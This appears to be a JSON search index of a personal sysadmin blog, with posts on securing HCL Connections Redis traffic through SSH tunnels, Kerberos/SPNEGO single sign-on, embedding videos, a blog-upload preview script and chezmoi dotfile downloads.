[{"body":"","excerpt":"","ref":"https://stoeps.de/categories/","title":"Categories"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/component-pack/","title":"Component Pack"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/componentpack/","title":"Componentpack"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/encryption/","title":"Encryption"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-connections/","title":"Hcl Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/hcl-digital-solutions/","title":"HCL Digital Solutions"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hclcnx/","title":"Hclcnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/redis/","title":"Redis"},{"body":"At the moment I\u0026rsquo;m working with a customer to secure all traffic in HCL Connections. The target is to have only encrypted network traffic between servers.\nToday I started enabling encryption to Redis. This is a documented process , but the documentation is outdated and incomplete.\nOverview of the Solution This guide explains how to secure Redis traffic using SSH tunnels between:\nWebSphere nodes and the HAProxy server HAProxy server and Kubernetes nodes Setting Up SSH Tunnels from WebSphere to HAProxy One important deviation from the official documentation: we\u0026rsquo;ll create and use a dedicated unprivileged user account for our SSH tunnels instead of the documented root user. This follows security best practices by adhering to the principle of least privilege.\nInstead of RSA encrypted keys, I recommend the more secure and easier to handle ed25519 algorithm.\nCreating an Unprivileged User for SSH Tunnels Run this on all WebSphere Nodes, the server hosting HAProxy, and all Kubernetes Nodes. Set a password for the created user:\nadduser redis-tunnel-user passwd redis-tunnel-user Generate SSH Keys on WebSphere Nodes On each WebSphere application server node:\nsu - redis-tunnel-user mkdir ~/.ssh chmod 700 ~/.ssh cd ~/.ssh ssh-keygen -t ed25519 -f tunnel -P \u0026#39;\u0026#39; -C \u0026#34;${USER}:$(hostname -s)\u0026#34; Create an SSH key for each WebSphere node.\nGenerate SSH Keys on HAProxy Server Create an SSH key on your HAProxy server:\nsu - redis-tunnel-user mkdir ~/.ssh chmod 700 ~/.ssh cd ~/.ssh ssh-keygen -t ed25519 -f tunnel -P \u0026#39;\u0026#39; -C \u0026#34;${USER}:$(hostname -s)\u0026#34; Copy WebSphere Keys to HAProxy Server Get the content of /home/redis-tunnel-user/.ssh/tunnel.pub from each WebSphere Node and copy it to /home/redis-tunnel-user/.ssh/authorized_keys on the HAProxy server. Or use ssh-copy-id to add the local key to the server users authorized_keys.\nOn each WebSphere node as user redis-tunnel-user (cnx8.stoeps.home is my load balancing server that hosts haproxy):\nssh-copy-id -i ~/.ssh/tunnel cnx8.stoeps.home /usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: \u0026#34;/home/redis-tunnel-user/.ssh/tunnel.pub\u0026#34; The authenticity of host \u0026#39;cnx8.stoeps.home (10.0.22.80)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:TVXyu05rngd3mPH5S+twnzDzYbAVDQCUFldSltqOG9I. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes /usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed /usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys redis-tunnel-user@cnx8.stoeps.home\u0026#39;s password: Number of key(s) added: 1 Now try logging into the machine, with: \u0026#34;ssh \u0026#39;cnx8.stoeps.home\u0026#39;\u0026#34; and check to make sure that only the key(s) you wanted were added. You\u0026rsquo;ll need to use the password for the first login and confirm the SSH key fingerprint.\nCreate Systemd Service for WebSphere Nodes Create a systemd service to start and stop the tunnel on each WebSphere node:\n/etc/systemd/system/redis-tunnel.service [Unit] Description=SSH tunnel to REDIS After=network.target [Service] Type=simple User=root ExecStart=/usr/bin/ssh -i /home/redis-tunnel-user/.ssh/tunnel cnx8.stoeps.home -L 30379:127.0.0.1:30379 -N \u0026amp; ExecStop=/usr/bin/pkill -f \u0026#39;ssh -i /home/redis-tunnel-user/.ssh/tunnel cnx8.stoeps.home -L 30379:127.0.0.1:30379 -N\u0026#39; Restart=always RestartSec=30 User=redis-tunnel-user [Install] WantedBy=multi-user.target Enable and start the service:\nsystemctl daemon-reload systemctl enable --now redis-tunnel.service Now you can manage the service with:\nsystemctl start redis-tunnel.service systemctl stop redis-tunnel.service systemctl status redis-tunnel.service Configure Connections to Use the Tunnel Tell Connections to use the tunnel by opening https://cnx8.stoeps.home/connections/config/highway.main.settings.tiles and changing c2.export.redis.host to localhost.\nRestrict HAProxy to Local Connections To ensure only the encrypted tunnel is used, modify /etc/haproxy/haproxy.cfg:\nChange from:\nfrontend haproxy_redis bind *:30379 mode tcp option tcplog To:\nfrontend haproxy_redis bind 127.0.0.1:30379 mode tcp option tcplog This change limits the port to localhost/127.0.0.1, preventing any connection from outside the server.\nRestart HAProxy:\nsystemctl restart haproxy After restarting haproxy the tunnels need to be restarted!\nSetting Up SSH Tunnels from HAProxy to Kubernetes Nodes At this point, we\u0026rsquo;ve secured the traffic between WebSphere nodes and the HAProxy server, but there\u0026rsquo;s still a security gap: the traffic from the loadbalancer to the Kubernetes nodes remains unencrypted and vulnerable. Now we\u0026rsquo;ll close this gap by establishing SSH tunnels from the HAProxy server to each Kubernetes node in the cluster.\nGenerate SSH Keys on HAProxy Server Create an SSH key on the HAProxy server (if not already done):\nsu - redis-tunnel-user mkdir ~/.ssh chmod 700 ~/.ssh cd ~/.ssh ssh-keygen -t ed25519 -f tunnel -P \u0026#39;\u0026#39; -C \u0026#34;${USER}:$(hostname -s)\u0026#34; Copy the key to all Kubernetes nodes:\nssh-copy-id -i ~/.ssh/tunnel cnx8-k8s-master.stoeps.home ssh-copy-id -i ~/.ssh/tunnel cnx8-k8s-worker1.stoeps.home ssh-copy-id -i ~/.ssh/tunnel cnx8-k8s-worker2.stoeps.home Create Systemd Service on HAProxy Server Create a systemd service on the loadbalancer/HAProxy server:\n/etc/systemd/system/redis-tunnel.service\n[Unit] Description=SSH tunnels for Redis servers After=network.target [Service] Type=simple User=root ExecStart=/bin/bash -c \u0026#39;/usr/bin/ssh -i /home/redis-tunnel-user/.ssh/tunnel cnx8-k8s-master.stoeps.home -L 30379:cnx8-k8s-master.stoeps.home:30379 -N \u0026amp; \\ /usr/bin/ssh -i /home/redis-tunnel-user/.ssh/tunnel cnx8-k8s-worker1.stoeps.home -L 30380:cnx8-k8s-worker1.stoeps.home:30379 -N \u0026amp; \\ /usr/bin/ssh -i /home/redis-tunnel-user/.ssh/tunnel cnx8-k8s-worker2.stoeps.home -L 30381:cnx8-k8s-worker2.stoeps.home:30379 -N \u0026amp; \\ wait\u0026#39; ExecStop=/bin/bash -c \u0026#39;/usr/bin/pkill -f \u0026#34;ssh -i /redis-tunnel-user/.ssh/tunnel cnx8-k8s-master.stoeps.home -L 30379\u0026#34; ; \\ /usr/bin/pkill -f \u0026#34;ssh -i /redis-tunnel-user/.ssh/tunnel cnx8-k8s-worker1.stoeps.home -L 30380\u0026#34; ; \\ /usr/bin/pkill -f \u0026#34;ssh -i /redis-tunnel-user/.ssh/tunnel cnx8-k8s-worker2.stoeps.home -L 30381\u0026#34;\u0026#39; Restart=always RestartSec=30 User=redis-tunnel-user [Install] WantedBy=multi-user.target Note: This uses three different local ports on the HAProxy server to open tunnels to each Kubernetes node.\nUpdate HAProxy Configuration Modify haproxy.cfg to use the local tunneled ports:\nbackend masters_redis mode tcp option tcplog option tcp-check balance roundrobin default-server inter 10s downinter 5s rise 2 fall 2 slowstart 60s maxconn 1000 maxqueue 1024 weight 100 # server cnx8-k8s-master.stoeps.home cnx8-k8s-master.stoeps.home:30379 check # server cnx8-k8s-worker1.stoeps.home cnx8-k8s-worker1.stoeps.home:30379 check # server cnx8-k8s-worker2.stoeps.home cnx8-k8s-worker2.stoeps.home:30379 check server cnx8-k8s-master.stoeps.home 127.0.0.1:30379 check server cnx8-k8s-worker1.stoeps.home 127.0.0.1:30380 check server cnx8-k8s-worker2.stoeps.home 127.0.0.1:30381 check Restart HAProxy and ensure the SSH tunnels from the WebSphere nodes are running.\nTesting the Redis Connection SSH into one of your WebSphere nodes and use telnet or netcat to connect to Redis:\ndnf install netcat telnet nc 127.0.0.1 30379 auth password +OK subscribe connections.events *3 $9 subscribe $18 connections.events :1 telnet 127.0.0.1 30379 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is \u0026#39;^]\u0026#39;. auth password +OK subscribe connections.events *3 $9 subscribe $18 connections.events :1 Verify Connection with Connections UI Open your Connections URL Top Updates (e.g., https://cnx8.stoeps.home/homepage/web/updates/#topUpdates/topUpdates/all )\nThe easiest way to see a working connection is to use the \u0026ldquo;Share something\u0026rdquo; box. You should see JSON data in the open Redis connection:\n*3 $7 message $18 connections.events $1103 { \u0026#34;id\u0026#34;:\u0026#34;9e1072d4-05d3-4bbb-9c3b-a8cb6c36eb30\u0026#34;, \u0026#34;name\u0026#34;:\u0026#34;community.calendar.membership.synchronized\u0026#34;, \u0026#34;startTime\u0026#34;:\u0026#34;1746471047358\u0026#34;, \u0026#34;type\u0026#34;:\u0026#34;UPDATE\u0026#34;, \u0026#34;actor\u0026#34;:{ \u0026#34;id\u0026#34;:\u0026#34;admin\u0026#34;, \u0026#34;name\u0026#34;:\u0026#34;Community Events Admin\u0026#34;, \u0026#34;email\u0026#34;:\u0026#34;null\u0026#34; }, \u0026#34;object\u0026#34;:{ \u0026#34;id\u0026#34;:\u0026#34;null\u0026#34;, \u0026#34;name\u0026#34;:\u0026#34;null\u0026#34;, ... Summary While Redis offers TLS support , it needs to be built into the container. Since the container isn\u0026rsquo;t prepared for TLS, we use SSH tunnels as described in the documentation to encrypt server traffic.\nThe official documentation doesn\u0026rsquo;t mention HAProxy configuration changes for high availability or how to handle multiple Kubernetes hosts. It also uses outdated commands like /etc/init.d instead of systemd. Using systemd services instead of commands in /etc/rc.local is more reliable.\nThis guide provides a clearer, more complete process for securing Redis traffic in an HCL Connections environment with modern best practices.\n","excerpt":"\u003cp\u003eAt the moment I\u0026rsquo;m working with a customer to secure all traffic in HCL Connections. The target is to have only encrypted network traffic between servers.\u003c/p\u003e\n\u003cp\u003eToday I started enabling encryption to Redis. This is a \u003ca href=\"https://help.hcl-software.com/connections/v8/admin/install/cp_config_om_redis_secure_linux.html\" target=\"_blank\"\u003edocumented process \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, but the documentation is outdated and incomplete.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/securing_redis_traffic_in_hcl_connections/","title":"Securing Redis Traffic in HCL Connections with SSH Tunnels"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/","title":"Tags"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/blogs/","title":"Blogs"},{"body":"Today I read the article KB0118248 and remembered my blog post from 2018 . I also checked the attached aha idea where a comment states that you can use iframe for Youtube. Despite what KB0118248 incorrectly states, it is absolutely possible to embed videos in HCL Connections blogs and wikis using the HTML video tag as demonstrated in this post.\nFirst of all, when streaming local videos in Connections, you should be aware of Videostreaming in HCL Connections ! Without \u0026ldquo;Download through IHS,\u0026rdquo; the memory consumption of the Files cluster grows indefinitely.\n\u0026lt;video src=\u0026#34;url from files viewer\u0026#34; controls autoplay width=\u0026#34;640px\u0026#34;\u0026gt;\u0026lt;/video\u0026gt; We can use autoplay with the video tag, but it changes during the blog post saving process. Tiny editors changes autoplay to autoplay=\u0026quot;autoplay\u0026quot; (I haven\u0026rsquo;t checked if CKEditor makes the same change). Unfortunately, this breaks the autoplay function of the video tag.\nWhen you change the source in the browser console and remove =\u0026quot;autoplay\u0026quot;, the video starts playing. I don\u0026rsquo;t recommend enabling any autoplay as this also starts the video in the blog overview page (View all entries).\nI tested the code saved by Tiny Editors in Last Updates and clicking on the message about the blog post opens the preview to the post and starts the video audio (I would mark this as a bug, as the video is not displayed, but audio is running). This creates an unpleasant experience. You could add muted to disable the audio (if Tiny allows this), because hearing video sounds from colleagues in cubicles or large office spaces can be quite annoying.\nEmbedding videos still works in 8.0CR9 as I described in my 2018 post. If you want to use this feature, I highly recommend enabling Download through IHS! Forget about autoplay - nobody wants several videos to start automatically when someone adds them to a single post. Users should decide when a video starts playback.\nHere is a working example on HCL Connections Preview: https://preview.hclconnections.net/blogs/9d87a005-13dd-4e98-b66f-3011dbc10218/entry/Embedded_video?lang=en_us It would be great to have a Tiny editors plugin that opens a select box to find the video, grabs the video link, and posts the code automatically. I won\u0026rsquo;t build this myself, as I\u0026rsquo;m satisfied with copying the HTML snippet and using it from the HTML source code editor.\n","excerpt":"\u003cp\u003eToday I read the article \u003ca href=\"https://support.hcl-software.com/csm?id=kb_article\u0026amp;sysparm_article=KB0118248\" target=\"_blank\"\u003eKB0118248 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and remembered my \u003ca href=\"https://stoeps.de/posts/2018/2018-02-05-embed-uploaded-videos-to-ibm-connections-blog-post-or-wiki-page/\" target=\"_blank\"\u003eblog post from 2018 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I also checked the attached \u003ca href=\"https://connections-ideas.hcltechsw.com/ideas/IDEACNCTNS-I-2499\" target=\"_blank\"\u003eaha idea \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n where a comment states that you can use iframe for Youtube. \u003cstrong\u003eDespite what KB0118248 incorrectly states, it is absolutely possible to embed videos in HCL Connections blogs and wikis using the HTML video tag as demonstrated in this post.\u003c/strong\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/embedded_videos_in_connections/","title":"Embed a video into Wikis or Blogs"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/video/","title":"Video"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/wikis/","title":"Wikis"},{"body":"The HCL Connections documentation describes the process for configuring Windows desktop single-sign-on in a somewhat complicated way. Here are the necessary steps for setting up with the highest possible encryption.\nThe Connections 8 documentation has some formatting issues in the SPNEGO section, but you can still use the one from Connections 7 (linked above).\nWindows Settings Service user for Kerberos delegation For security, I registered an AD User svc-cnx as a standard user for Kerberos.\nIt\u0026rsquo;s important to enable these two options now, as the user needs a password change to actually use the higher encryption ciphers!\nCreate keytab (as Windows Administrator) I tried using the commands from the official documentation, but without -ptype KRB5_NT_PRINCIPAL -crypto AES256-SHA1 it didn\u0026rsquo;t work. It created a keytab, but showed this warning:\nWARNING: pType and account type do not match. This might cause problems. Here\u0026rsquo;s the working command to generate the keytab file:\nktpass -out cnx8_aes.keytab -princ HTTP/cnx8.stoeps.home@AD.STOEPS.HOME -mapuser svc-cnx@ad.stoeps.home -mapOp set -pass Passw0rd1 -crypto AES256-SHA1 -ptype KRB5_NT_PRINCIPAL Command switch Description -out filename of keytab file -princ SPN name (HTTP/ + Nginx server hostname + @REALMNAME) -mapuser our service user which we created for Kerberos delegation -pass Password of the user (use a new one, so the new crypto ciphers are used) I registered the SPN to the first webserver - in this case, the nginx server which sends part of the traffic to the customizer and the other part to IHS.\nTo check the content of your keytab ktpass -in cnx8_aes.keytab Existing keytab: Keytab version: 0x502 keysize 87 HTTP/cnx8.stoeps.home@AD.STOEPS.HOME ptype 1 (KRB5_NT_PRINCIPAL) vno 5 etype 0x12 (AES256-SHA1) keylength 32 ... WARNING: No principal name specified. The keytab file without the -ptype KRB5_NT_PRINCIPAL -crypto AES256-SHA1 switches (even with the AES option activated in the user profile):\nktpass -in .\\Desktop\\cnx8.keytab Existing keytab: Keytab version: 0x502 keysize 71 HTTP/cnx8.stoeps.home@AD.STOEPS.HOME ptype 0 (KRB5_NT_UNKNOWN) vno 3 etype 0x17 (RC4-HMAC) keylength 16 ... WARNING: No principal name specified. The KRB8_NT_UNKNOWN type broke my SSO.\nDelegate SPN Go back to Active Directory Users and Computers and open the svc-cnx user account.\nWebSphere register kdc $AdminTask createKrbConfigFile { -krbPath /opt/IBM/SharedArea/kdc/krb5.conf -realm AD.STOEPS.HOME -kdcHost dc.ad.stoeps.home -dns dc.ad.stoeps.home -keytabPath /opt/IBM/SharedArea/kdc/cnx8_aes.keytab } I recommend copying the krb5.conf and keytab to a folder on the Connections Shared Directory. If you use the path from the documentation, you\u0026rsquo;ll need to replicate/copy the files on each WebSphere node.\nCommand switch Description -krbPath path to config file, this file will be generated with the command -realm REALMNAME in capitals as used in the ktpass command -kdcHost, -dns Kerberos hostname (Domain Controller) -keytabPath path to the keytab file generated on the Windows server (copy to same directory as krb5.conf) Additional configuration in Integrated Solutions Console Create a new SPNEGO Filter:\nCopy the filter from Configuring SPNEGO (and Kerberos optionally) on WebSphere® Application Server .\nActivate the two options Trim Kerberos realm from principal name and Enable delegation of Kerberos credentials. Save your changes with OK.\nBack at SPNEGO web authentication page, add the path to your keytab and krb5.conf files.\nDo not enable Use the alias host name for the application server, or you\u0026rsquo;ll need to register a keytab file for each WebSphere Application server.\nRestart the Deployment Manager, synchronize all nodes, and restart the nodeagents and application servers as well.\nA word about the WebSphere Realm Name In several SPNEGO and troubleshooting guides, you\u0026rsquo;ll find tips to change the realm name from defaultWIMFileBasedRealm to the LDAP server hostname and to use a Windows account for the admin user in connectionsAdmin and WebSphere. I\u0026rsquo;ve never had issues using the default realm name or a local user for SPNEGO. This hasn\u0026rsquo;t been necessary since at least WebSphere Application server 8.0.\nTest single-sign on I typically test with Firefox on a Windows Desktop that\u0026rsquo;s a member of the AD domain.\nOpen Firefox config with about:config and search for negotiate.\nAdd the Connections URL to network.negotiate-auth.delegation-uris and network.negotiate-auth.trusted-uris.\nNow access the Connections Profiles (e.g. https://cnx8.stoeps.home/profiles) and check if SSO is working. I don\u0026rsquo;t use /homepage because SSO hasn\u0026rsquo;t worked with Homepage since early Connections 8.0.\nI got /homepage working with a change in Enterprise Applications \u0026gt; Homepage \u0026gt; Security role to user/group mapping (Thanks Martin for the tip):\nTroubleshooting On Windows desktop, check klist:\nYou can delete all Kerberos tickets with klist purge, and they\u0026rsquo;ll be recreated when you access a service secured by Kerberos. To verify if SSO is working, delete all tickets, clear the browser cookies for your Connections host, and load Connections again.\nEnable Kerberos traces Application servers \u0026gt; AppServer hosting Profiles \u0026gt; Process definition \u0026gt; Java Virtual Machine \u0026gt; Custom properties\nName Value com.ibm.security.jgss.debug all com.ibm.security.krb5.Krb5Debug all To disable, set both to off.\nKerberos messages will now be logged to the application server SystemOut.log.\nConfigure Time Synchronization in Redhat 9 and Windows 2019 Clock synchronization is crucial for Kerberos authentication (which SPNEGO uses) because it relies heavily on timestamps for security. Here\u0026rsquo;s why it\u0026rsquo;s so important:\nKerberos uses a timestamp-based mechanism to prevent replay attacks. When a ticket is issued, it contains timestamps that indicate when the ticket was created and when it expires. All parties in the authentication process check these timestamps.\nIf the clocks aren\u0026rsquo;t synchronized:\nTicket validation fails: If the server clock is significantly ahead of the client, it might reject valid tickets as \u0026ldquo;not yet valid\u0026rdquo; or already expired. Premature expiration: If the server clock is ahead, tickets might be considered expired before their actual lifetime ends. Replay attack vulnerability: If clocks are too far out of sync, the time window used to detect replay attacks becomes ineffective. Authentication failures: The Kerberos protocol typically allows only a small time skew (usually around 5 minutes by default) between systems. Beyond this threshold, authentication attempts will fail with errors like the one you\u0026rsquo;re seeing. Kerberos implementations use these strict time requirements as a security feature. If an attacker captured a Kerberos ticket, they would only have a limited time window to use it. Without synchronized clocks, this security mechanism breaks down.\nFor WebSphere specifically, the JVM hosting the application passes the Kerberos authentication requests to the operating system\u0026rsquo;s security mechanisms, which enforce these time synchronization requirements.\nWindows 2019 PS C:\\Users\\Administrator\u0026gt; W32tm /register W32Time successfully registered. PS C:\\Users\\Administrator\u0026gt; W32tm /dumpreg Value Name Value Type Value Data -------------------------------------------------------- Type REG_DWORD 32 Start REG_DWORD 2 ErrorControl REG_DWORD 1 ImagePath REG_EXPAND_SZ %SystemRoot%\\system32\\svchost.exe -k LocalService DisplayName REG_SZ @%SystemRoot%\\system32\\w32time.dll,-200 ObjectName REG_SZ NT AUTHORITY\\LocalService Description REG_SZ @%SystemRoot%\\system32\\w32time.dll,-201 FailureActions REG_BINARY 80510100000000000000000003000000140000000100000060EA000001000000C0D401000000000000000000 ServiceSidType REG_DWORD 1 RequiredPrivileges REG_MULTI_SZ SeAuditPrivilege, SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeSystemTimePrivilege, SeImpersonatePrivilege DelayedAutostart REG_DWORD 1 PS C:\\Users\\Administrator\u0026gt; w32tm /config /syncfromflags:manual /manualpeerlist:\u0026#34;0.de.pool.ntp.org 1.de.pool.ntp.org 2.de.pool.ntp.org 3.de.pool.ntp.org\u0026#34; /update PS C:\\Users\\Administrator\u0026gt; w32tm /resync /force Restart the Windows Time Service from the Services Tool.\nRedhat 9 on Libvirt This is only needed when the virtual machine is running on LibVirt:\necho ptp_kvm \u0026gt; /etc/modules-load.d/ptp_kvm.conf echo \u0026#34;refclock PHC /dev/ptp0 poll 2\u0026#34; \u0026gt;\u0026gt; /etc/chrony.conf systemctl restart chrony chrony Use chrony to synchronize time on RedHat 9 VMs.\nConfigure timezone timedatectl set-timezone Europe/Amsterdam ","excerpt":"\u003cp\u003eThe \u003ca href=\"https://help.hcl-software.com/connections/v7/admin/secure/t_install_kerb_setup_spnego.html\" target=\"_blank\"\u003eHCL Connections documentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n describes the process for configuring Windows desktop single-sign-on in a somewhat complicated way.\nHere are the necessary steps for setting up with the highest possible encryption.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/kerberos_single_sign/","title":"Configure Kerberos / SPNEGO with Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/connections/","title":"Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/kerberos/","title":"Kerberos"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/single-sign-on/","title":"Single Sign On"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/spnego/","title":"Spnego"},{"body":"I received several complaints from users who struggle to identify uploaded images in the File Uploads section of blogs. This happens because pasted images get cryptic filenames like editor_image_ + UUID, making it challenging to identify and delete unused images.\nBlogs upload view To solve this problem, I used the customizer to load additional JavaScript that adds more information to this view, helping users make informed decisions about which images can be safely deleted.\nNo support or warranty is provided for the code. Use at your own risk.\nJSON to import in customizer { \u0026#34;name\u0026#34;: \u0026#34;Blog File Uploads\u0026#34;, \u0026#34;title\u0026#34;: \u0026#34;Add preview and counter to Blog File Uploads\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;Adding a bit more value for users to Blogs File Uploads\u0026#34;, \u0026#34;services\u0026#34;: [ \u0026#34;Connections\u0026#34;, \u0026#34;Customizer\u0026#34; ], \u0026#34;state\u0026#34;: \u0026#34;enabled\u0026#34;, \u0026#34;extensions\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;Blogs\u0026#34;, \u0026#34;type\u0026#34;: \u0026#34;com.ibm.customizer.ui\u0026#34;, \u0026#34;payload\u0026#34;: { \u0026#34;include-files\u0026#34;: [ \u0026#34;stoeps-customizer-css/blog-upload-preview.js\u0026#34;, \u0026#34;stoeps-customizer-css/blog-upload.css\u0026#34; ], \u0026#34;match\u0026#34;: { \u0026#34;url\u0026#34;: \u0026#34;roller-ui/authoring/uploadFiles.do\u0026#34; }, \u0026#34;cache-headers\u0026#34;: { \u0026#34;cache-control\u0026#34;: \u0026#34;max-age=0\u0026#34; } }, \u0026#34;path\u0026#34;: \u0026#34;blogs\u0026#34;, \u0026#34;state\u0026#34;: \u0026#34;enabled\u0026#34; } ] } There is a very good article on the different options of Customizer payloads. I used it to find the \u0026quot;match\u0026quot;:{\u0026quot;url\u0026quot;: \u0026quot;roller-ui/...\u0026quot;} option to include the JavaScript and CSS only for the upload URL.\nInstallation Files Download these files and copy them to the customizer NFS share (/pv-connections/customizer) in the folder stoeps-customizer-css (or adjust paths in the customizer app):\nblog-upload.css blog-upload-preview.js How It Works After injecting blog-upload-preview.js, a new button appears that lets users add a preview column to the images and displays a counter showing how often each image is used within the blog.\nBlogs upload view with the new button to toggle count and preview When you click the button, the view transforms:\nThis script only checks for image usage within the current blog! If content was copied between blogs, an image might be used elsewhere, so the counter isn\u0026rsquo;t 100% reliable.\nView of uploaded blog images with added count and preview, sorted by usage count You can view any image at its full size by clicking on it. The enlarged view closes when you click anywhere outside the image.\nOverlay display showing image at original size With this enhancement, you can easily identify unused images and directly select them for deletion, making blog maintenance significantly easier.\n","excerpt":"\u003cp\u003eI received several complaints from users who struggle to identify uploaded images in the \u003ccode\u003eFile Uploads\u003c/code\u003e section of blogs. This happens because pasted images get cryptic filenames like \u003ccode\u003eeditor_image_\u003c/code\u003e + \u003ccode\u003eUUID\u003c/code\u003e, making it challenging to identify and delete unused images.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/add_preview_to_blogs_uploads/","title":"Add preview and usage counter to blogs uploads"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cnx/","title":"Cnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/customizer/","title":"Customizer"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ibmcnx/","title":"Ibmcnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/preview/","title":"Preview"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/chezmoi/","title":"Chezmoi"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/dotfiles/","title":"Dotfiles"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/download/","title":"Download"},{"body":"I use chezmoi for my dotfiles. To find out why and how to get started, check out my talk from Chemnitzer Linuxtage 2025 .\nWithin chezmoi, you can use the file .chezmoiexternal.toml to download archives or git repositories during updates. This is particularly useful for managing external dependencies. Let me walk you through some common use cases.\nGit Repositories As I use Oh My Zsh for my shell, I clone the repository to .oh-my-zsh. That\u0026rsquo;s easy with this entry:\n[\u0026#34;.oh-my-zsh\u0026#34;] type = \u0026#34;git-repo\u0026#34; url = \u0026#34;https://github.com/ohmyzsh/ohmyzsh.git\u0026#34; refreshPeriod = \u0026#34;168h\u0026#34; This clones the repository to ~/.oh-my-zsh (the path specified in the square brackets). To prevent Oh My Zsh\u0026rsquo;s built-in auto-update mechanism, I added the following line to my ~/.zshrc:\nDISABLE_AUTO_UPDATE=\u0026#34;true\u0026#34; This way, I let chezmoi handle the updates instead of Oh My Zsh\u0026rsquo;s own update system.\nDownloading Releases When you want to get the latest release from a GitHub repository, you can configure it in .chezmoiexternal.toml:\n[\u0026#34;.local/share\u0026#34;] type = \u0026#34;archive\u0026#34; url = \u0026#34;https://github.com/neovim/neovim/releases/latest/download/nvim-{{ .chezmoi.os }}-x86_64.tar.gz\u0026#34; refreshPeriod = \u0026#34;168h\u0026#34; This downloads the latest release of neovim from GitHub and extracts the files to ~/.local/share. The package extraction creates a folder named nvim-linux-x86_64. I then created a symbolic link to a folder in my $PATH:\nls ~/.local/bin/nvim -al lrwxrwxrwx. 1 stoeps stoeps 56 Mar 5 20:41 /var/home/stoeps/.local/bin/nvim -\u0026gt; /var/home/stoeps/.local/share/nvim-linux-x86_64/bin/nvim This symbolic link is also part of my Chezmoi repository.\nWith this setup, each time I run chezmoi apply (but only once every 168 hours, which equals 7 days), I get the latest release of neovim.\nI manage this with chezmoi rather than within my distrobox/toolboxes because I want to use the latest and greatest neovim version across all my toolboxes.\nReleases with Version Numbers (updated 2025-04-14) Some GitHub software includes the version number in the filename, which means you can\u0026rsquo;t simply use \u0026ldquo;latest\u0026rdquo; in the URL.\nIn the initial version of the post, I showed a script to check for the version number and update .chezmoiexternal.toml, but I got a mail from Tom Payne the maintainer of chezmoi, who pointed me to the GitHub functions included in chezmoi. He also sent me the link to his dotfiles repository with working examples .\nSo we can just use gitHubLatestReleaseAssetURL to get the latest version from Hugo:\n[\u0026#34;.local/bin/hugo\u0026#34;] type = \u0026#34;archive-file\u0026#34; url = {{ gitHubLatestReleaseAssetURL \u0026#34;gohugoio/hugo\u0026#34; (printf \u0026#34;hugo_*_%s-%s.tar.gz\u0026#34; .chezmoi.os .chezmoi.arch) | quote }} executable = true path = \u0026#34;hugo\u0026#34; This extracts just the Hugo binary from the downloaded package and places it directly into ~/.local/bin/hugo. The download URL uses variables for .chezmoi.os and .chezmoi.arch, which get replaced with the values from the running system (in my case, linux and amd64).\nSince I build my blog with a GitLab action using the latest available Hugo version, it\u0026rsquo;s important for me to have an up-to-date version locally so I can test changes and new posts directly.\nI really appreciate that Tom monitors articles and talks about chezmoi, and he also sent me a mail with a shortcut for my talk at Chemnitzer Linuxtage on the day of the talk. Thanks for the awesome tool Tom!\n","excerpt":"\u003cp\u003eI use \u003ca href=\"https://www.chezmoi.io/\" target=\"_blank\"\u003e\u003ccode\u003echezmoi\u003c/code\u003e \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for my dotfiles. To find out why and how to get started, check out \u003ca href=\"https://media.ccc.de/v/clt25-240-effiziente-dotfile-verwaltung-chezmoi-im-einsatz\" target=\"_blank\"\u003emy talk \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n from \u003ca href=\"https://chemnitzer.linux-tage.de/2025/en\" target=\"_blank\"\u003eChemnitzer Linuxtage 2025 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eWithin \u003ccode\u003echezmoi\u003c/code\u003e, you can use the file \u003ccode\u003e.chezmoiexternal.toml\u003c/code\u003e to download archives or git repositories during updates. This is particularly useful for managing external dependencies. Let me walk you through some common use 